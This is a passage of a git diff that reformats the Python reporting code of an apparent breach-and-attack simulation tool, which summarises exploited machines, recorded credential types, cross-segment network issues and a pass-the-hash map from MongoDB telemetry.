{"machines": [], "services": []} + user_details[username]["machines"].append(machine) + user_details[username]["services"] += crit_machines[machine]["critical_services"] return [ { - 'username': user, - 'machines': user_details[user]['machines'], - 'services_names': user_details[user]['services'] - } for user in user_details + "username": user, + "machines": user_details[user]["machines"], + "services_names": user_details[user]["services"], + } + for user in user_details ] @staticmethod @@ -222,12 +240,13 @@ class PTHReportService(object): return [ { - 'id': monkey.guid, - 'label': '{0} : {1}'.format(monkey.hostname, monkey.ip_addresses[0]), - 'group': 'critical' if monkey.critical_services is not None else 'normal', - 'services': monkey.critical_services, - 'hostname': monkey.hostname - } for monkey in monkeys + "id": monkey.guid, + "label": "{0} : {1}".format(monkey.hostname, monkey.ip_addresses[0]), + "group": "critical" if monkey.critical_services is not None else "normal", + "services": monkey.critical_services, + "hostname": monkey.hostname, + } + for monkey in monkeys ] @staticmethod @@ -235,52 +254,38 @@ class PTHReportService(object): edges_list = [] comp_users = mongo.db.groupsandusers.find( - { - 'admin_on_machines': {'$ne': []}, - 'secret_location': {'$ne': []}, - 'type': USERTYPE - }, - { - 'admin_on_machines': 1, 'secret_location': 1 - } + {"admin_on_machines": {"$ne": []}, "secret_location": {"$ne": []}, "type": USERTYPE}, + {"admin_on_machines": 1, "secret_location": 1}, ) for user in comp_users: # A list comp, to get all unique pairs of attackers and victims. - for pair in [pair for pair in product(user['admin_on_machines'], user['secret_location']) - if pair[0] != pair[1]]: + for pair in [ + pair + for pair in product(user["admin_on_machines"], user["secret_location"]) + if pair[0] != pair[1] + ]: edges_list.append( - { - 'from': pair[1], - 'to': pair[0], - 'id': str(pair[1]) + str(pair[0]) - } + {"from": pair[1], "to": pair[0], "id": str(pair[1]) + str(pair[0])} ) return edges_list @staticmethod def get_pth_map(): return { - 'nodes': PTHReportService.generate_map_nodes(), - 'edges': PTHReportService.generate_edges() + "nodes": PTHReportService.generate_map_nodes(), + "edges": PTHReportService.generate_edges(), } @staticmethod def get_report(): pth_map = PTHReportService.get_pth_map() PTHReportService.get_strong_users_on_critical_machines_nodes() - report = \ - { - 'report_info': - { - 'strong_users_table': PTHReportService.get_strong_users_on_crit_details() - }, - - 'pthmap': - { - 'nodes': pth_map.get('nodes'), - 'edges': pth_map.get('edges') - } - } + report = { + "report_info": { + "strong_users_table": PTHReportService.get_strong_users_on_crit_details() + }, + "pthmap": {"nodes": pth_map.get("nodes"), "edges": pth_map.get("edges")}, + } return report diff --git a/monkey/monkey_island/cc/services/reporting/report.py b/monkey/monkey_island/cc/services/reporting/report.py index 6430a2559..5bbb64f39 100644 --- a/monkey/monkey_island/cc/services/reporting/report.py +++ b/monkey/monkey_island/cc/services/reporting/report.py @@ -12,19 +12,31 @@ from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey from monkey_island.cc.services.utils.network_utils import get_subnets, local_ip_addresses from monkey_island.cc.services.config import ConfigService -from common.config_value_paths import (EXPLOITER_CLASSES_PATH, LOCAL_NETWORK_SCAN_PATH, - PASSWORD_LIST_PATH, SUBNET_SCAN_LIST_PATH, - USER_LIST_PATH) -from 
monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups +from common.config_value_paths import ( + EXPLOITER_CLASSES_PATH, + LOCAL_NETWORK_SCAN_PATH, + PASSWORD_LIST_PATH, + SUBNET_SCAN_LIST_PATH, + USER_LIST_PATH, +) +from monkey_island.cc.services.configuration.utils import ( + get_config_network_segments_as_subnet_groups, +) from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_descriptor_enum import ExploiterDescriptorEnum -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import \ - CredentialType -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import \ - ExploiterReportInfo +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_descriptor_enum import ( + ExploiterDescriptorEnum, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import ( + CredentialType, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( + ExploiterReportInfo, +) from monkey_island.cc.services.reporting.pth_report import PTHReportService from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager -from monkey_island.cc.services.reporting.report_generation_synchronisation import safe_generate_regular_report +from monkey_island.cc.services.reporting.report_generation_synchronisation import ( + safe_generate_regular_report, +) __author__ = "itay.mizeretz" @@ -32,7 +44,6 @@ logger = logging.getLogger(__name__) class ReportService: - class DerivedIssueEnum: WEAK_PASSWORD = "weak_password" STOLEN_CREDS = "stolen_creds" @@ -40,11 +51,19 @@ class ReportService: @staticmethod def get_first_monkey_time(): - return mongo.db.telemetry.find({}, {'timestamp': 1}).sort([('$natural', 1)]).limit(1)[0]['timestamp'] + return ( + mongo.db.telemetry.find({}, {"timestamp": 1}) + .sort([("$natural", 1)]) + .limit(1)[0]["timestamp"] + ) @staticmethod def get_last_monkey_dead_time(): - return mongo.db.telemetry.find({}, {'timestamp': 1}).sort([('$natural', -1)]).limit(1)[0]['timestamp'] + return ( + mongo.db.telemetry.find({}, {"timestamp": 1}) + .sort([("$natural", -1)]) + .limit(1)[0]["timestamp"] + ) @staticmethod def get_monkey_duration(): @@ -65,26 +84,34 @@ class ReportService: def get_tunnels(): return [ { - 'type': 'tunnel', - 'machine': NodeService.get_node_hostname(NodeService.get_node_or_monkey_by_id(tunnel['_id'])), - 'dest': NodeService.get_node_hostname(NodeService.get_node_or_monkey_by_id(tunnel['tunnel'])) + "type": "tunnel", + "machine": NodeService.get_node_hostname( + NodeService.get_node_or_monkey_by_id(tunnel["_id"]) + ), + "dest": NodeService.get_node_hostname( + NodeService.get_node_or_monkey_by_id(tunnel["tunnel"]) + ), } - for tunnel in mongo.db.monkey.find({'tunnel': {'$exists': True}}, {'tunnel': 1})] + for tunnel in mongo.db.monkey.find({"tunnel": {"$exists": True}}, {"tunnel": 1}) + ] @staticmethod def get_azure_issues(): creds = ReportService.get_azure_creds() - machines = set([instance['origin'] for instance in creds]) + machines = set([instance["origin"] for instance in creds]) - logger.info('Azure issues generated for reporting') + logger.info("Azure issues generated for reporting") return [ { - 'type': 'azure_password', - 'machine': machine, - 'users': set([instance['username'] for instance in creds if 
instance['origin'] == machine]) + "type": "azure_password", + "machine": machine, + "users": set( + [instance["username"] for instance in creds if instance["origin"] == machine] + ), } - for machine in machines] + for machine in machines + ] @staticmethod def get_scanned(): @@ -93,60 +120,75 @@ class ReportService: nodes = ReportService.get_all_displayed_nodes() for node in nodes: - nodes_that_can_access_current_node = node['accessible_from_nodes_hostnames'] + nodes_that_can_access_current_node = node["accessible_from_nodes_hostnames"] formatted_nodes.append( { - 'label': node['label'], - 'ip_addresses': node['ip_addresses'], - 'accessible_from_nodes': nodes_that_can_access_current_node, - 'services': node['services'], - 'domain_name': node['domain_name'], - 'pba_results': node['pba_results'] if 'pba_results' in node else 'None' - }) + "label": node["label"], + "ip_addresses": node["ip_addresses"], + "accessible_from_nodes": nodes_that_can_access_current_node, + "services": node["services"], + "domain_name": node["domain_name"], + "pba_results": node["pba_results"] if "pba_results" in node else "None", + } + ) - logger.info('Scanned nodes generated for reporting') + logger.info("Scanned nodes generated for reporting") return formatted_nodes @staticmethod def get_all_displayed_nodes(): - nodes_without_monkeys = [NodeService.get_displayed_node_by_id(node['_id'], True) for node in - mongo.db.node.find({}, {'_id': 1})] - nodes_with_monkeys = [NodeService.get_displayed_node_by_id(monkey['_id'], True) for monkey in - mongo.db.monkey.find({}, {'_id': 1})] + nodes_without_monkeys = [ + NodeService.get_displayed_node_by_id(node["_id"], True) + for node in mongo.db.node.find({}, {"_id": 1}) + ] + nodes_with_monkeys = [ + NodeService.get_displayed_node_by_id(monkey["_id"], True) + for monkey in mongo.db.monkey.find({}, {"_id": 1}) + ] nodes = nodes_without_monkeys + nodes_with_monkeys return nodes @staticmethod def get_exploited(): - exploited_with_monkeys = \ - [NodeService.get_displayed_node_by_id(monkey['_id'], True) for monkey in - mongo.db.monkey.find({}, {'_id': 1}) if - not NodeService.get_monkey_manual_run(NodeService.get_monkey_by_id(monkey['_id']))] + exploited_with_monkeys = [ + NodeService.get_displayed_node_by_id(monkey["_id"], True) + for monkey in mongo.db.monkey.find({}, {"_id": 1}) + if not NodeService.get_monkey_manual_run(NodeService.get_monkey_by_id(monkey["_id"])) + ] - exploited_without_monkeys = [NodeService.get_displayed_node_by_id(node['_id'], True) for node in - mongo.db.node.find({'exploited': True}, {'_id': 1})] + exploited_without_monkeys = [ + NodeService.get_displayed_node_by_id(node["_id"], True) + for node in mongo.db.node.find({"exploited": True}, {"_id": 1}) + ] exploited = exploited_with_monkeys + exploited_without_monkeys exploited = [ { - 'label': exploited_node['label'], - 'ip_addresses': exploited_node['ip_addresses'], - 'domain_name': exploited_node['domain_name'], - 'exploits': ReportService.get_exploits_used_on_node(exploited_node) + "label": exploited_node["label"], + "ip_addresses": exploited_node["ip_addresses"], + "domain_name": exploited_node["domain_name"], + "exploits": ReportService.get_exploits_used_on_node(exploited_node), } - for exploited_node in exploited] + for exploited_node in exploited + ] - logger.info('Exploited nodes generated for reporting') + logger.info("Exploited nodes generated for reporting") return exploited @staticmethod def get_exploits_used_on_node(node: dict) -> List[str]: - return 
list(set([ExploiterDescriptorEnum.get_by_class_name(exploit['exploiter']).display_name - for exploit in node['exploits'] - if exploit['result']])) + return list( + set( + [ + ExploiterDescriptorEnum.get_by_class_name(exploit["exploiter"]).display_name + for exploit in node["exploits"] + if exploit["result"] + ] + ) + ) @staticmethod def get_stolen_creds(): @@ -158,27 +200,31 @@ class ReportService: stolen_exploit_creds = ReportService._get_credentials_from_exploit_telems() creds.extend(stolen_exploit_creds) - logger.info('Stolen creds generated for reporting') + logger.info("Stolen creds generated for reporting") return creds @staticmethod def _get_credentials_from_system_info_telems(): formatted_creds = [] - for telem in mongo.db.telemetry.find({'telem_category': 'system_info', 'data.credentials': {'$exists': True}}, - {'data.credentials': 1, 'monkey_guid': 1}): - creds = telem['data']['credentials'] - origin = NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname'] + for telem in mongo.db.telemetry.find( + {"telem_category": "system_info", "data.credentials": {"$exists": True}}, + {"data.credentials": 1, "monkey_guid": 1}, + ): + creds = telem["data"]["credentials"] + origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"] formatted_creds.extend(ReportService._format_creds_for_reporting(telem, creds, origin)) return formatted_creds @staticmethod def _get_credentials_from_exploit_telems(): formatted_creds = [] - for telem in mongo.db.telemetry.find({'telem_category': 'exploit', 'data.info.credentials': {'$exists': True}}, - {'data.info.credentials': 1, 'data.machine': 1, 'monkey_guid': 1}): - creds = telem['data']['info']['credentials'] - domain_name = telem['data']['machine']['domain_name'] - ip = telem['data']['machine']['ip_addr'] + for telem in mongo.db.telemetry.find( + {"telem_category": "exploit", "data.info.credentials": {"$exists": True}}, + {"data.info.credentials": 1, "data.machine": 1, "monkey_guid": 1}, + ): + creds = telem["data"]["info"]["credentials"] + domain_name = telem["data"]["machine"]["domain_name"] + ip = telem["data"]["machine"]["ip_addr"] origin = domain_name if domain_name else ip formatted_creds.extend(ReportService._format_creds_for_reporting(telem, creds, origin)) return formatted_creds @@ -186,7 +232,11 @@ class ReportService: @staticmethod def _format_creds_for_reporting(telem, monkey_creds, origin): creds = [] - CRED_TYPE_DICT = {'password': 'Clear Password', 'lm_hash': 'LM hash', 'ntlm_hash': 'NTLM hash'} + CRED_TYPE_DICT = { + "password": "Clear Password", + "lm_hash": "LM hash", + "ntlm_hash": "NTLM hash", + } if len(monkey_creds) == 0: return [] @@ -194,13 +244,14 @@ class ReportService: for cred_type in CRED_TYPE_DICT: if cred_type not in monkey_creds[user] or not monkey_creds[user][cred_type]: continue - username = monkey_creds[user]['username'] if 'username' in monkey_creds[user] else user - cred_row = \ - { - 'username': username, - 'type': CRED_TYPE_DICT[cred_type], - 'origin': origin - } + username = ( + monkey_creds[user]["username"] if "username" in monkey_creds[user] else user + ) + cred_row = { + "username": username, + "type": CRED_TYPE_DICT[cred_type], + "origin": origin, + } if cred_row not in creds: creds.append(cred_row) return creds @@ -213,17 +264,27 @@ class ReportService: """ creds = [] for telem in mongo.db.telemetry.find( - {'telem_category': 'system_info', 'data.ssh_info': {'$exists': True}}, - {'data.ssh_info': 1, 'monkey_guid': 1} + {"telem_category": "system_info", "data.ssh_info": {"$exists": True}}, 
+ {"data.ssh_info": 1, "monkey_guid": 1}, ): - origin = NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname'] - if telem['data']['ssh_info']: + origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"] + if telem["data"]["ssh_info"]: # Pick out all ssh keys not yet included in creds - ssh_keys = [{'username': key_pair['name'], 'type': 'Clear SSH private key', - 'origin': origin} for key_pair in telem['data']['ssh_info'] - if - key_pair['private_key'] and {'username': key_pair['name'], 'type': 'Clear SSH private key', - 'origin': origin} not in creds] + ssh_keys = [ + { + "username": key_pair["name"], + "type": "Clear SSH private key", + "origin": origin, + } + for key_pair in telem["data"]["ssh_info"] + if key_pair["private_key"] + and { + "username": key_pair["name"], + "type": "Clear SSH private key", + "origin": origin, + } + not in creds + ] creds.extend(ssh_keys) return creds @@ -235,23 +296,25 @@ class ReportService: """ creds = [] for telem in mongo.db.telemetry.find( - {'telem_category': 'system_info', 'data.Azure': {'$exists': True}}, - {'data.Azure': 1, 'monkey_guid': 1} + {"telem_category": "system_info", "data.Azure": {"$exists": True}}, + {"data.Azure": 1, "monkey_guid": 1}, ): - azure_users = telem['data']['Azure']['usernames'] + azure_users = telem["data"]["Azure"]["usernames"] if len(azure_users) == 0: continue - origin = NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname'] - azure_leaked_users = [{'username': user.replace(',', '.'), 'type': 'Clear Password', - 'origin': origin} for user in azure_users] + origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"] + azure_leaked_users = [ + {"username": user.replace(",", "."), "type": "Clear Password", "origin": origin} + for user in azure_users + ] creds.extend(azure_leaked_users) - logger.info('Azure machines creds generated for reporting') + logger.info("Azure machines creds generated for reporting") return creds @staticmethod def process_exploit(exploit) -> ExploiterReportInfo: - exploiter_type = exploit['data']['exploiter'] + exploiter_type = exploit["data"]["exploiter"] exploiter_descriptor = ExploiterDescriptorEnum.get_by_class_name(exploiter_type) processor = exploiter_descriptor.processor() exploiter_info = processor.get_exploit_info_by_dict(exploiter_type, exploit) @@ -259,11 +322,16 @@ class ReportService: @staticmethod def get_exploits() -> List[dict]: - query = [{'$match': {'telem_category': 'exploit', 'data.result': True}}, - {'$group': {'_id': {'ip_address': '$data.machine.ip_addr'}, - 'data': {'$first': '$$ROOT'}, - }}, - {"$replaceRoot": {"newRoot": "$data"}}] + query = [ + {"$match": {"telem_category": "exploit", "data.result": True}}, + { + "$group": { + "_id": {"ip_address": "$data.machine.ip_addr"}, + "data": {"$first": "$$ROOT"}, + } + }, + {"$replaceRoot": {"newRoot": "$data"}}, + ] exploits = [] for exploit in mongo.db.telemetry.aggregate(query): new_exploit = ReportService.process_exploit(exploit) @@ -274,26 +342,26 @@ class ReportService: @staticmethod def get_monkey_subnets(monkey_guid): network_info = mongo.db.telemetry.find_one( - {'telem_category': 'system_info', - 'monkey_guid': monkey_guid}, - {'data.network_info.networks': 1} + {"telem_category": "system_info", "monkey_guid": monkey_guid}, + {"data.network_info.networks": 1}, ) if network_info is None or not network_info["data"]: return [] - return \ - [ - ipaddress.ip_interface(str(network['addr'] + '/' + network['netmask'])).network - for network in 
network_info['data']['network_info']['networks'] - ] + return [ + ipaddress.ip_interface(str(network["addr"] + "/" + network["netmask"])).network + for network in network_info["data"]["network_info"]["networks"] + ] @staticmethod def get_island_cross_segment_issues(): issues = [] island_ips = local_ip_addresses() - for monkey in mongo.db.monkey.find({'tunnel': {'$exists': False}}, {'tunnel': 1, 'guid': 1, 'hostname': 1}): + for monkey in mongo.db.monkey.find( + {"tunnel": {"$exists": False}}, {"tunnel": 1, "guid": 1, "hostname": 1} + ): found_good_ip = False - monkey_subnets = ReportService.get_monkey_subnets(monkey['guid']) + monkey_subnets = ReportService.get_monkey_subnets(monkey["guid"]) for subnet in monkey_subnets: for ip in island_ips: if ipaddress.ip_address(str(ip)) in subnet: @@ -303,9 +371,12 @@ class ReportService: break if not found_good_ip: issues.append( - {'type': 'island_cross_segment', 'machine': monkey['hostname'], - 'networks': [str(subnet) for subnet in monkey_subnets], - 'server_networks': [str(subnet) for subnet in get_subnets()]} + { + "type": "island_cross_segment", + "machine": monkey["hostname"], + "networks": [str(subnet) for subnet in monkey_subnets], + "server_networks": [str(subnet) for subnet in get_subnets()], + } ) return issues @@ -321,10 +392,10 @@ class ReportService: """ cross_segment_issues = [] - for monkey in mongo.db.monkey.find({}, {'ip_addresses': 1, 'hostname': 1}): + for monkey in mongo.db.monkey.find({}, {"ip_addresses": 1, "hostname": 1}): ip_in_src = None ip_in_dst = None - for ip_addr in monkey['ip_addresses']: + for ip_addr in monkey["ip_addresses"]: if source_subnet_range.is_in_range(str(ip_addr)): ip_in_src = ip_addr break @@ -333,7 +404,7 @@ class ReportService: if not ip_in_src: continue - for ip_addr in monkey['ip_addresses']: + for ip_addr in monkey["ip_addresses"]: if target_subnet_range.is_in_range(str(ip_addr)): ip_in_dst = ip_addr break @@ -341,12 +412,13 @@ class ReportService: if ip_in_dst: cross_segment_issues.append( { - 'source': ip_in_src, - 'hostname': monkey['hostname'], - 'target': ip_in_dst, - 'services': None, - 'is_self': True - }) + "source": ip_in_src, + "hostname": monkey["hostname"], + "target": ip_in_dst, + "services": None, + "is_self": True, + } + ) return cross_segment_issues @@ -369,26 +441,28 @@ class ReportService: scans.rewind() # If we iterated over scans already we need to rewind. 
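The cross-segment checks re-wrapped above reduce to a membership test: does the monkey own an address inside the source subnet while the machine it scanned sits in the target subnet, without the monkey itself having a foothold there. A small illustration with the standard-library ipaddress module instead of the project's NetworkRange helper; the subnets and addresses are arbitrary examples:

    # Sketch: the subnet-membership test behind the cross-segment issue detection.
    # Uses stdlib ipaddress; the project itself goes through NetworkRange.is_in_range.
    import ipaddress

    source = ipaddress.ip_network("10.0.0.0/24")
    target = ipaddress.ip_network("10.0.1.0/24")
    machine_ips = ["10.0.0.7", "192.168.56.4"]  # example addresses owned by one monkey

    ip_in_src = next((ip for ip in machine_ips if ipaddress.ip_address(ip) in source), None)
    ip_in_dst = next((ip for ip in machine_ips if ipaddress.ip_address(ip) in target), None)

    if ip_in_src and not ip_in_dst:
        print(ip_in_src, "reached a machine in", target, "across segment boundaries")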
for scan in scans: - target_ip = scan['data']['machine']['ip_addr'] + target_ip = scan["data"]["machine"]["ip_addr"] if target_subnet_range.is_in_range(str(target_ip)): - monkey = NodeService.get_monkey_by_guid(scan['monkey_guid']) - cross_segment_ip = get_ip_in_src_and_not_in_dst(monkey['ip_addresses'], - source_subnet_range, - target_subnet_range) + monkey = NodeService.get_monkey_by_guid(scan["monkey_guid"]) + cross_segment_ip = get_ip_in_src_and_not_in_dst( + monkey["ip_addresses"], source_subnet_range, target_subnet_range + ) if cross_segment_ip is not None: cross_segment_issues.append( { - 'source': cross_segment_ip, - 'hostname': monkey['hostname'], - 'target': target_ip, - 'services': scan['data']['machine']['services'], - 'icmp': scan['data']['machine']['icmp'], - 'is_self': False - }) + "source": cross_segment_ip, + "hostname": monkey["hostname"], + "target": target_ip, + "services": scan["data"]["machine"]["services"], + "icmp": scan["data"]["machine"]["icmp"], + "is_self": False, + } + ) return cross_segment_issues + ReportService.get_cross_segment_issues_of_single_machine( - source_subnet_range, target_subnet_range) + source_subnet_range, target_subnet_range + ) @staticmethod def get_cross_segment_issues_per_subnet_group(scans, subnet_group): @@ -404,22 +478,31 @@ class ReportService: for subnet_pair in itertools.product(subnet_group, subnet_group): source_subnet = subnet_pair[0] target_subnet = subnet_pair[1] - pair_issues = ReportService.get_cross_segment_issues_per_subnet_pair(scans, source_subnet, target_subnet) + pair_issues = ReportService.get_cross_segment_issues_per_subnet_pair( + scans, source_subnet, target_subnet + ) if len(pair_issues) != 0: cross_segment_issues.append( { - 'source_subnet': source_subnet, - 'target_subnet': target_subnet, - 'issues': pair_issues - }) + "source_subnet": source_subnet, + "target_subnet": target_subnet, + "issues": pair_issues, + } + ) return cross_segment_issues @staticmethod def get_cross_segment_issues(): - scans = mongo.db.telemetry.find({'telem_category': 'scan'}, - {'monkey_guid': 1, 'data.machine.ip_addr': 1, 'data.machine.services': 1, - 'data.machine.icmp': 1}) + scans = mongo.db.telemetry.find( + {"telem_category": "scan"}, + { + "monkey_guid": 1, + "data.machine.ip_addr": 1, + "data.machine.services": 1, + "data.machine.icmp": 1, + }, + ) cross_segment_issues = [] @@ -427,7 +510,9 @@ class ReportService: subnet_groups = get_config_network_segments_as_subnet_groups() for subnet_group in subnet_groups: - cross_segment_issues += ReportService.get_cross_segment_issues_per_subnet_group(scans, subnet_group) + cross_segment_issues += ReportService.get_cross_segment_issues_per_subnet_group( + scans, subnet_group + ) return cross_segment_issues @@ -440,30 +525,35 @@ class ReportService: issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, []) domain_issues_dict = {} for issue in issues: - if not issue.get('is_local', True): - machine = issue.get('machine').upper() - aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine')) + if not issue.get("is_local", True): + machine = issue.get("machine").upper() + aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get("machine")) if machine not in domain_issues_dict: domain_issues_dict[machine] = [] if aws_instance_id: - issue['aws_instance_id'] = aws_instance_id + issue["aws_instance_id"] = aws_instance_id domain_issues_dict[machine].append(issue) - logger.info('Domain issues generated for reporting') + logger.info("Domain 
issues generated for reporting") return domain_issues_dict @staticmethod def get_machine_aws_instance_id(hostname): - aws_instance_id_list = list(mongo.db.monkey.find({'hostname': hostname}, {'aws_instance_id': 1})) + aws_instance_id_list = list( + mongo.db.monkey.find({"hostname": hostname}, {"aws_instance_id": 1}) + ) if aws_instance_id_list: - if 'aws_instance_id' in aws_instance_id_list[0]: - return str(aws_instance_id_list[0]['aws_instance_id']) + if "aws_instance_id" in aws_instance_id_list[0]: + return str(aws_instance_id_list[0]["aws_instance_id"]) else: return None @staticmethod def get_manual_monkeys(): - return [monkey['hostname'] for monkey in mongo.db.monkey.find({}, {'hostname': 1, 'parent': 1, 'guid': 1}) if - NodeService.get_monkey_manual_run(monkey)] + return [ + monkey["hostname"] + for monkey in mongo.db.monkey.find({}, {"hostname": 1, "parent": 1, "guid": 1}) + if NodeService.get_monkey_manual_run(monkey) + ] @staticmethod def get_config_users(): @@ -482,10 +572,11 @@ class ReportService: exploits = ConfigService.get_config_value(exploits_config_value, True, True) if exploits == default_exploits: - return ['default'] + return ["default"] - return [ExploiterDescriptorEnum.get_by_class_name(exploit).display_name - for exploit in exploits] + return [ + ExploiterDescriptorEnum.get_by_class_name(exploit).display_name for exploit in exploits + ] @staticmethod def get_config_ips(): @@ -508,29 +599,36 @@ class ReportService: elif ReportService._is_zerologon_pass_restore_failed(issue): issue_set.add(ReportService.DerivedIssueEnum.ZEROLOGON_PASS_RESTORE_FAILED) - issue_set.add(issue['type']) + issue_set.add(issue["type"]) return issue_set @staticmethod - def _is_weak_credential_issue(issue: dict, config_usernames: List[str], config_passwords: List[str]) -> bool: + def _is_weak_credential_issue( + issue: dict, config_usernames: List[str], config_passwords: List[str] + ) -> bool: # Only credential exploiter issues have 'credential_type' - return 'credential_type' in issue and \ - issue['credential_type'] == CredentialType.PASSWORD.value and \ - issue['password'] in config_passwords and \ - issue['username'] in config_usernames + return ( + "credential_type" in issue + and issue["credential_type"] == CredentialType.PASSWORD.value + and issue["password"] in config_passwords + and issue["username"] in config_usernames + ) @staticmethod def _is_stolen_credential_issue(issue: dict) -> bool: # Only credential exploiter issues have 'credential_type' - return 'credential_type' in issue and \ - (issue['credential_type'] == CredentialType.PASSWORD.value or - issue['credential_type'] == CredentialType.HASH.value) + return "credential_type" in issue and ( + issue["credential_type"] == CredentialType.PASSWORD.value + or issue["credential_type"] == CredentialType.HASH.value + ) @staticmethod def _is_zerologon_pass_restore_failed(issue: dict): - return issue['type'] == ExploiterDescriptorEnum.ZEROLOGON.value.class_name \ - and not issue['password_restored'] + return ( + issue["type"] == ExploiterDescriptorEnum.ZEROLOGON.value.class_name + and not issue["password_restored"] + ) @staticmethod def is_report_generated(): @@ -549,40 +647,32 @@ class ReportService: scanned_nodes = ReportService.get_scanned() exploited_nodes = ReportService.get_exploited() - report = \ - { - 'overview': - { - 'manual_monkeys': ReportService.get_manual_monkeys(), - 'config_users': config_users, - 'config_passwords': config_passwords, - 'config_exploits': ReportService.get_config_exploits(), - 'config_ips': 
ReportService.get_config_ips(), - 'config_scan': ReportService.get_config_scan(), - 'monkey_start_time': ReportService.get_first_monkey_time().strftime("%d/%m/%Y %H:%M:%S"), - 'monkey_duration': ReportService.get_monkey_duration(), - 'issues': issue_set, - 'cross_segment_issues': cross_segment_issues - }, - 'glance': - { - 'scanned': scanned_nodes, - 'exploited': exploited_nodes, - 'stolen_creds': ReportService.get_stolen_creds(), - 'azure_passwords': ReportService.get_azure_creds(), - 'ssh_keys': ReportService.get_ssh_keys(), - 'strong_users': PTHReportService.get_strong_users_on_crit_details() - }, - 'recommendations': - { - 'issues': issues, - 'domain_issues': domain_issues - }, - 'meta': - { - 'latest_monkey_modifytime': monkey_latest_modify_time - } - } + report = { + "overview": { + "manual_monkeys": ReportService.get_manual_monkeys(), + "config_users": config_users, + "config_passwords": config_passwords, + "config_exploits": ReportService.get_config_exploits(), + "config_ips": ReportService.get_config_ips(), + "config_scan": ReportService.get_config_scan(), + "monkey_start_time": ReportService.get_first_monkey_time().strftime( + "%d/%m/%Y %H:%M:%S" + ), + "monkey_duration": ReportService.get_monkey_duration(), + "issues": issue_set, + "cross_segment_issues": cross_segment_issues, + }, + "glance": { + "scanned": scanned_nodes, + "exploited": exploited_nodes, + "stolen_creds": ReportService.get_stolen_creds(), + "azure_passwords": ReportService.get_azure_creds(), + "ssh_keys": ReportService.get_ssh_keys(), + "strong_users": PTHReportService.get_strong_users_on_crit_details(), + }, + "recommendations": {"issues": issues, "domain_issues": domain_issues}, + "meta": {"latest_monkey_modifytime": monkey_latest_modify_time}, + } ReportExporterManager().export(report) mongo.db.report.drop() mongo.db.report.insert_one(ReportService.encode_dot_char_before_mongo_insert(report)) @@ -597,22 +687,22 @@ class ReportService: ReportService.get_island_cross_segment_issues, ReportService.get_azure_issues, PTHReportService.get_duplicated_passwords_issues, - PTHReportService.get_strong_users_on_crit_issues + PTHReportService.get_strong_users_on_crit_issues, ] issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, []) issues_dict = {} for issue in issues: - if issue.get('is_local', True): - machine = issue.get('machine').upper() - aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine')) + if issue.get("is_local", True): + machine = issue.get("machine").upper() + aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get("machine")) if machine not in issues_dict: issues_dict[machine] = [] if aws_instance_id: - issue['aws_instance_id'] = aws_instance_id + issue["aws_instance_id"] = aws_instance_id issues_dict[machine].append(issue) - logger.info('Issues generated for reporting') + logger.info("Issues generated for reporting") return issues_dict @staticmethod @@ -622,7 +712,7 @@ class ReportService: ,,, combo instead. :return: dict with formatted keys with no dots. """ - report_as_json = json_util.dumps(report_dict).replace('.', ',,,') + report_as_json = json_util.dumps(report_dict).replace(".", ",,,") return json_util.loads(report_as_json) @staticmethod @@ -631,10 +721,10 @@ class ReportService: This function checks if a monkey report was already generated and if it's the latest one. :return: True if report is the latest one, False if there isn't a report or its not the latest. 
""" - latest_report_doc = mongo.db.report.find_one({}, {'meta.latest_monkey_modifytime': 1}) + latest_report_doc = mongo.db.report.find_one({}, {"meta.latest_monkey_modifytime": 1}) if latest_report_doc: - report_latest_modifytime = latest_report_doc['meta']['latest_monkey_modifytime'] + report_latest_modifytime = latest_report_doc["meta"]["latest_monkey_modifytime"] latest_monkey_modifytime = Monkey.get_latest_modifytime() return report_latest_modifytime == latest_monkey_modifytime @@ -648,7 +738,9 @@ class ReportService: """ delete_result = mongo.db.report.delete_many({}) if mongo.db.report.count_documents({}) != 0: - raise RuntimeError("Report cache not cleared. DeleteResult: " + delete_result.raw_result) + raise RuntimeError( + "Report cache not cleared. DeleteResult: " + delete_result.raw_result + ) @staticmethod def decode_dot_char_before_mongo_insert(report_dict): @@ -656,7 +748,7 @@ class ReportService: this function replaces the ',,,' combo with the '.' char instead. :return: report dict with formatted keys (',,,' -> '.') """ - report_as_json = json_util.dumps(report_dict).replace(',,,', '.') + report_as_json = json_util.dumps(report_dict).replace(",,,", ".") return json_util.loads(report_as_json) @staticmethod @@ -667,6 +759,9 @@ class ReportService: @staticmethod def did_exploit_type_succeed(exploit_type): - return mongo.db.edge.count( - {'exploits': {'$elemMatch': {'exploiter': exploit_type, 'result': True}}}, - limit=1) > 0 + return ( + mongo.db.edge.count( + {"exploits": {"$elemMatch": {"exploiter": exploit_type, "result": True}}}, limit=1 + ) + > 0 + ) diff --git a/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py b/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py index 865556b0d..00414028f 100644 --- a/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py +++ b/monkey/monkey_island/cc/services/reporting/report_exporter_manager.py @@ -1,6 +1,6 @@ import logging -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" logger = logging.getLogger(__name__) @@ -30,4 +30,4 @@ class ReportExporterManager(object, metaclass=Singleton): try: exporter().handle_report(report) except Exception as e: - logger.exception('Failed to export report, error: ' + e) + 